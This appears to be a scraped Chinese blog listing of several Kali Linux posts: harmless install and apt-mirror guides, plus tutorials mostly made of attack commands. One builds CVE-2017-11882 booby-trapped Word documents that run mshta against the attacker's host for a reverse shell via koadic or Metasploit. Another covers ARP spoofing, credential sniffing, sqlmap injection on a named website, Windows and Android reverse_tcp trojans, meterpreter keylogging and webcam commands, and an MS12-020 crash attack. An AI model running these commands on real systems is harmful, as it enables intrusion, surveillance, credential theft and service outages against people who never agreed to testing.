2018-11-05 13:42:09 weixin_42254735 阅读数 477
  • VMware虚拟机从入门到精通

    虚拟机就是一个软件,模拟一个电脑来使用。让初级的小白也能学会使用虚拟机,并且能够精通。本课程由浅入深,详细讲解了虚拟机的安装导入使用,用黑客喜欢的KALI系统进行导入演示。

    4190 人正在学习 去看看 董文磊

1. 安装:apt install wps-office  (无法安装的话可以去WPS官网下载安装包( www.wps.cn/product/wpslinux/# ),然后使用命令:dpkg -i /root/下载/wps-office_10.1.0.6757_amd64.deb)

                注意: dpkg是用来安装.deb文件,但不会解决模块的依赖关系,且不会关心软件仓库内的软件,可以用于安装本地的deb文件。  apt会解决和安装模块的依赖问题,并会咨询软件仓库, 但不会安装本地的deb文件, apt是建立在dpkg之上的软件管理工具。

2. 安装完毕后,打开wps时,会提示缺少字体,访问百度网盘(链接: https://pan.baidu.com/s/1skIP4oX 密码: ewgh ,这是别人整理好的字体包),下载–解压(unzip /root/下载/linux-wps-office-fonts.zip),将解压出的wps-office文件夹(/root/wps-office/)复制到/usr/share/fonts/ 即可,运行wps发现提示没有了,可以正常使用了。


 

2018-11-22 21:47:27 qq_36374896 阅读数 130
  • VMware虚拟机从入门到精通

    虚拟机就是一个软件,模拟一个电脑来使用。让初级的小白也能学会使用虚拟机,并且能够精通。本课程由浅入深,详细讲解了虚拟机的安装导入使用,用黑客喜欢的KALI系统进行导入演示。

    4190 人正在学习 去看看 董文磊

测试环境:win7+kali+office 2007 xp+kali+office 2003
win7 ip:10.10.1.144 xp ip: 10.10.1.126 kali ip 10.10.1.67

一. 简单测试弹出计算器(xp)

1.在kali下执行生成一个含有恶意代码的doc进行测试:

PythonCommand109b_CVE-2017-11882 -c “cmd.exe /c calc.exe” -o test.doc

这条指令的意思是调用cmd并执行calc.exe(即计算器)
在这里插入图片描述

2.在靶机上打开就会弹出计算器:

在这里插入图片描述

二. 通过koadic漏洞复现(xp)

1.下载koadic并启用

https://github.com/backlion/koadic.git

2.执行./koadice

在这里插入图片描述
首先看一下koadic怎么用直接
在这里插入图片描述

3.接下来设置shell的接受地址以及端口

Set lhost 10.10.1.67
Set lport 55555
Run

在这里插入图片描述
这儿需要注意的是生成的网址需要记住,以方便后面应用
接下来通过poc生成一个含有恶意代码的doc文件

python Command109b_CVE-2017-11882.py -c “mshtahttp://10.10.1.67:55555/Ly348” -o exploit.doc

在这里插入图片描述
接下来在目标主机打开钓鱼文档
切回koadic则发现发生变化
在这里插入图片描述
这个时候说明入侵成功并已经反弹shell
接下来在koadic执行zombies 0 切换到项目
在这里插入图片描述
接下来用cmdshell模块
输入 cmdshell 0
在这里插入图片描述
这就已经进去cmd了接下来可以愉快的玩耍了
在这里插入图片描述
在这里插入图片描述

三. 通过msf的ps_shell模块 漏洞复现(win7)

1.启动msfconsole

在这里插入图片描述

2.查找对应的模块 search PS_shell

在这里插入图片描述
在这里插入图片描述

3.利用msf生成利用的powershell脚本

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
提示一点 在这儿的Command109b_CVE-2017-11882是109字节限制的 当然也有43字节的
1.接接下来在靶机打开测试文档就好
2.切换回kali 会出现
在这里插入图片描述
说明已经建立链接了
接下来输入sessions -i 查看一下
在这里插入图片描述
接下来切换进入
在这里插入图片描述
这个时候就已经入侵到靶机了。
在这里插入图片描述

四. 通过hta_server模块复现(xin7)

1.在msf搜索hta_server模块

在这里插入图片描述

2.进行设置

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3.在kali上生成带有恶意命令的doc

在这里插入图片描述

4.在靶机上打开test.doc文档 切换回kal

在这里插入图片描述

在这里插入图片描述
(之后的过程就和之前一样了,就不多啰嗦了)。
(ps:后两种是利用了powershell,所以在win7下测试的)

2019-07-13 23:01:57 heibaikong6 阅读数 1330
  • VMware虚拟机从入门到精通

    虚拟机就是一个软件,模拟一个电脑来使用。让初级的小白也能学会使用虚拟机,并且能够精通。本课程由浅入深,详细讲解了虚拟机的安装导入使用,用黑客喜欢的KALI系统进行导入演示。

    4190 人正在学习 去看看 董文磊

kali简介

kali 为linux操作系统的一个发行版
kali linux 前身是BackTrack(基于ubuntu),是一个基于Debian的linux发行版,包含很多安全和取证方面的相关工具。支持ARM结构
手机的cpu:ARM结构 PC或PC服务器:x86:i686(32位CPU),x86_64(64位CPU)

kali官方网站:https://www.kali.org
在这里插入图片描述
中文
http://cn.docs.kali.org/installing-kali-linux-cn/硬盘安装kali-linux

下载镜像:

在这里插入图片描述
https://www.kali.org/downloads/
在这里插入图片描述

安装kali系统,
安装和其他linux一致,只是选择系统时操作如下其余一致。
在这里插入图片描述
开启此虚拟机
在这里插入图片描述
选择图形化安装Graphical install 回车执行
在这里插入图片描述
选择中文简体
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
设置主机名,和Windows的主机名一样:

在这里插入图片描述
可以暂时不用输入:在这里插入图片描述
设置用户密码登录: 默认只有root模式
在这里插入图片描述
等待配置: 在这里插入图片描述
可以选择使用整个磁盘:
在这里插入图片描述


注:
这里简单介绍一下里面的 LVM 选项:
详见百度百科,LVM是 Logical Volume Manager(逻辑卷管理)的简写,它是Linux环境下对磁盘分区进行管理的一种机制。安装Linux时常出现的一个问题就是合理分区,根据使用情况设置 /boot, /var, /home 等区块的大小,设置好之后再想要改变就很麻烦,要用分区工具压缩一部分的空闲区出去,然后合并到空间不足的区域。

个人对LVM的理解是,它类似于使用一种文件夹的机制,直接使用整块磁盘,把每个分区设置成一种类似文件夹的存在,因为文件夹不会限制大小,因此就能动态调整各区的大小,方便管理。


继续:
在这里插入图片描述
可以使用推荐的:
在这里插入图片描述
确定分配,或者更改区块大小和新增区块:
在这里插入图片描述
确认写入:
在这里插入图片描述
接下来安装时间有点长,喝杯茶休息一下 -_-
在这里插入图片描述
终于安装完成,半小时安静的过去了……
这里选择不使用网络镜像:
在这里插入图片描述
配置GRUB:
在这里插入图片描述

在这里插入图片描述
安装完成:
在这里插入图片描述
在这里插入图片描述
选择启动,第二个选项是恢复模式:
在这里插入图片描述
初始用户名root,输入之前设置的密码
在这里插入图片描述
到此kali系统就安装完毕了:
在这里插入图片描述
内置大量软件可以挖掘

需要联网,需要配置apt-get源
安装软件包方式不一样:
kali 使用apt-get命令来安装软件
RHEL/centos:rpm或yum

  • 例如:kali/ubuntu下apt-get命令参数
    常用的APT命令参数
    apt-cache search package 搜索包
    apt-cache show package 获取包的相关信息,如说明,大小,版本等
    sudo apt-get install package 安装包
    sudo apt-get remove package 删除包
    sudo apt-get update 更新源
    sudo apt-get upgrade 更新已安装的包
    sudo apt-get dist-upgrade 升级系统
2019-08-26 11:59:35 Jiajiajiang_ 阅读数 1002
  • VMware虚拟机从入门到精通

    虚拟机就是一个软件,模拟一个电脑来使用。让初级的小白也能学会使用虚拟机,并且能够精通。本课程由浅入深,详细讲解了虚拟机的安装导入使用,用黑客喜欢的KALI系统进行导入演示。

    4190 人正在学习 去看看 董文磊

#更新源
gedit /etc/apt/sources.list

#中科大kali源

deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

#阿里云kali源

deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

#清华大学

deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free

deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free

#更新
apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y
 

kali
2016-10-05 17:03:37 tangsilian 阅读数 1689
  • VMware虚拟机从入门到精通

    虚拟机就是一个软件,模拟一个电脑来使用。让初级的小白也能学会使用虚拟机,并且能够精通。本课程由浅入深,详细讲解了虚拟机的安装导入使用,用黑客喜欢的KALI系统进行导入演示。

    4190 人正在学习 去看看 董文磊

kali虚拟机常见的问题

在本机和虚拟机间的文件交互

  • 安装vmtool
  • 先解压
  • tar vxzf VMtool
  • 在解压出来的文件夹中找到vmware-install.pl。双击运行它。

- 然后启动vmware-tools

连接xshell的时候注意先起ssh服务

kali的系统的更新

更新源
root@icunqiu:~# leafpad /etc/apt/sources.list
出现图形化界面
然后在里面加入阿里和中科的更新源

中科大kali源

deb http://mirrors.ustc.edu.cn/kali sana main non-free contrib
deb http://mirrors.ustc.edu.cn/kali-security/ sana/updates main contrib non-free
deb-src http://mirrors.ustc.edu.cn/kali-security/ sana/updates main contrib non-free

阿里云kali源

deb http://mirrors.aliyun.com/kali sana main non-free contrib
deb http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free
deb-src http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free

root@icunqiu:~# apt-get update

root@icunqiu:~# apt-get dist-upgrade

kali的系统美化

KDE桌面安装
apt-get install kde-f

开始使用kali

sqlmap:相当于win下面的名小子,NBSI

局域网断网攻击也叫arp攻击

工具:arpspoof

指令:arpspoof -i 网卡 -t 目标ip 网关
kali:网卡 eth0
目标:192.168.31.239
默认网关 192.168.1.1

替换掉:arpspoof -i eth0-t 192.168.31.239 192.168.1.1
~# arpspoof -i eth0 -t 192.168.31.22 192.168.1.1

怎么看局域网当中的ip呢?
fping -asg 192.168.31.0/24

为什么断网现象是arp欺骗,却出现断网现象。

出现的错误:
arpspoof: couldn’t arp for host
fping -asg 192.168.0.100/24 查看局域网中存活的主机

先ping一下目标主机,看是否ping得通

要攻击需要知到目标ip,网关(网关是啥?),本机网卡(eth0)。

arpspoof -i eth0 -t 目标IP 网关

ps:如果出现arpspoof: couldn’t arp for host ,要把虚拟机设置成桥接,或者关闭目标防火墙。

ARP欺骗

目标的ip 流量会经过我的网卡,从网关出去
(进行ip流量转发)

ARP断网

目标的ip 流量会经过我的网卡

进行ip流量转发:

root@icunqiu:~# echo 1 >/proc/sys/net/ipv4/ip_forward
root@icunqiu:~# vim /proc/sys/net/ipv4/ip_forward
echo *>/proc/—不会有回显

driftnet -》》获取本机网卡的图片

目标的ip他的流量会经过我的网卡 —》网关
driftnet -i eth0

http账号密码获取

Arpspoof -》》欺骗

ettercap—-》》欺骗 嗅探

ettercap -Tq -i eth0
-Tq 启动文本模式
即可监控该ip的http密码

开启命令行模式

ctrl+alt+f1
/etc/init.d/ssh/ start 开启ssh
然后就可以用xshell连接了

sststrip

能把https的链接还原为http

端口不一样前者80后者443
http+ssl构建的可进行加密传输

注入php网站

- 检测

- 检测是否是dba权限

- 列出所有的数据库

- 查询当前表

  • sqlmap -u “http://www.tmsyy.com/bencandy.php?fid=168&id=7299” –tables -D “ggec”
  • 猜解数据库的表名 根据数据库

    第一讲.Metasploit框架介绍
    第二讲.Metasploit升级更新
    第三讲.Metasploit端口扫描
    第四讲.Metasploit SMB 获取系统信息
    第五讲.Metasploit 服务识别
    第六讲.Metasploit 密码嗅探
    第七讲.Metasploit SNMP 扫描
    第八讲.Metasploit SMB登陆验证
    第九讲.Metasploit VNC身份识别
    第十讲.Metasploit WMAP Web扫描

metasploit

输入msfconsole
- Exploit模块 -》》漏洞利用
- Payloads -》》shellcode

使用模块

use exploit/windows/smb/ms08_67_netapi

选择漏洞利用模块

show options
查看要填入的参数
set RHOST 192.168.31.1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST selfip
执行:exploit

metasploit 执行远控

这个有教程:http://www.i0day.com/1173.html

1.根据自己的ip生成一个木马
我们的ip是192.168.102.136
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.102.136 LPORT=55555 X > abc.exe

2.use exploit/multi/handler
show options
set PAYLOAD windows/meterpreter/reverse_tcp

使用这个shellcode
LHOST = 192.168.102.136
LPORT = 55555
这里填生成木马的ip和端口

木马常用功能

background
sessions 1

注入进程: 木马随时可能被结束

ps:得到我们要注入的进程
Migrate xxx注入
2036 2004 expoler.exe 这个进程是桌面

远程桌面

Run vnc 开启远程桌面

木马文件管理功能

  • download
  • edit
  • cat
  • cd
  • mkdir
  • mv
  • rm
  • pwd
  • upload
  • rmdir

网络及系统操作

Arp 看缓冲表
ifconfig ip地址网卡
getproxy 获取代理
netstat 查看端口链接

kill 结束进程
ps 查看进程
reboot 重启
Reg 修改注册表
shell 拿取shell
shutdown 关闭电脑
sysinfo 系统信息

用户操作和其他功能讲解

enumdesktops 用户登录数目
keyscan_dump
keyscan_start
keyscan_stop
uictl
webcam_chat
webcam_list
webcam_stream
getsystem 获取高权限
hashdump 下载hash密文

生成android木马

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.102.136 R > Desktop/abc.apk

安装木马 然后开启exploit即可

服务器蓝屏攻击

DDOS
服务器开启3389
确定目标 ip
MS12 020

我们服务器远程桌面的一个利用模块
auxliary/scanner/rdp/ms12_020_check
扫描主机是否存在漏洞

RHOST R 开头,远程主机

目的:比ddos来的更直接一些,但是重启就解决了

拿webshell

msfpayload webshell/meterpreter/reverse_tcp LHOST=192.168.102.136 R > Desktop/web.shell

安装木马 然后开启exploit即可

pip官方安装脚本
wget https://raw.github.com/pypa/pip/master/contrib/get-pip.py
python get-pip.py

Kali Linux环境搭建

阅读数 224

Kali Linux 升级

阅读数 24

kali

博文 来自: Zach_z

Kali Linux渗透测试

阅读数 883

没有更多推荐了,返回首页